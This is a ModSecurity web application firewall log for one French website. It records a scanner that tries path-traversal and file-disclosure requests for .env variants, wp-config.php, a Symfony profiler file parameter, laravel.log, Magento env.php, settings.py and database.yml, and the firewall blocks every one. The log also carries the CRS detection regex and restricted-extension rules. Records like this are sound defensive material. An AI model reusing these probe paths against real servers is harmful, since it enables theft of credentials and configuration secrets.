[Tue May 12 05:10:32.440295 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/_profiler/open"] [unique_id "agKaKNr1yOh9TvizeziY3gAAAEQ"]
[Tue May 12 05:10:32.449616 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nOgAAAQE"]
[Tue May 12 05:10:32.449674 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nOgAAAQE"]
[Tue May 12 05:10:32.449781 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nOgAAAQE"]
[Tue May 12 05:10:32.449980 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKHo6NvB9WXx5V-6nOgAAAQE"]
[Tue May 12 05:10:32.457232 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/_profiler/open"] [unique_id "agKaKNr1yOh9TvizeziY3wAAAEQ"]
[Tue May 12 05:10:32.457544 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/_profiler/open"] [unique_id "agKaKNr1yOh9TvizeziY3wAAAEQ"]
[Tue May 12 05:10:32.457730 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/_profiler/open"] [unique_id "agKaKNr1yOh9TvizeziY3wAAAEQ"]
[Tue May 12 05:10:32.467067 2026] [core:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 05:10:32.484463 2026] [core:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 05:10:32.503070 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY4gAAAEc"]
[Tue May 12 05:10:32.503135 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY4gAAAEc"]
[Tue May 12 05:10:32.503240 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY4gAAAEc"]
[Tue May 12 05:10:32.503438 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY4gAAAEc"]
[Tue May 12 05:10:32.522493 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY5AAAAEc"]
[Tue May 12 05:10:32.522553 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY5AAAAEc"]
[Tue May 12 05:10:32.522660 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY5AAAAEc"]
[Tue May 12 05:10:32.522840 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKNr1yOh9TvizeziY5AAAAEc"]
[Tue May 12 05:10:32.542113 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKNr1yOh9TvizeziY5gAAAEc"]
[Tue May 12 05:10:32.542172 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKNr1yOh9TvizeziY5gAAAEc"]
[Tue May 12 05:10:32.542292 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKNr1yOh9TvizeziY5gAAAEc"]
[Tue May 12 05:10:32.542479 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKNr1yOh9TvizeziY5gAAAEc"]
[Tue May 12 05:10:32.544277 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "ixinabourgoin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKaKNr1yOh9TvizeziY5wAAAEQ"]
[Tue May 12 05:10:32.544456 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKaKNr1yOh9TvizeziY5wAAAEQ"]
[Tue May 12 05:10:32.544638 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKaKNr1yOh9TvizeziY5wAAAEQ"]
[Tue May 12 05:10:32.561731 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKNr1yOh9TvizeziY6AAAAEc"]
[Tue May 12 05:10:32.561856 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKNr1yOh9TvizeziY6AAAAEc"]
[Tue May 12 05:10:32.562065 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKNr1yOh9TvizeziY6AAAAEc"]
[Tue May 12 05:10:32.581099 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKNr1yOh9TvizeziY6QAAAEc"]
[Tue May 12 05:10:32.581244 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKNr1yOh9TvizeziY6QAAAEc"]
[Tue May 12 05:10:32.581440 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKNr1yOh9TvizeziY6QAAAEc"]
[Tue May 12 05:10:32.600576 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKNr1yOh9TvizeziY6gAAAEc"]
[Tue May 12 05:10:32.600731 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKNr1yOh9TvizeziY6gAAAEc"]
[Tue May 12 05:10:32.600947 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKNr1yOh9TvizeziY6gAAAEc"]
[Tue May 12 05:10:32.620178 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziY6wAAAEc"]
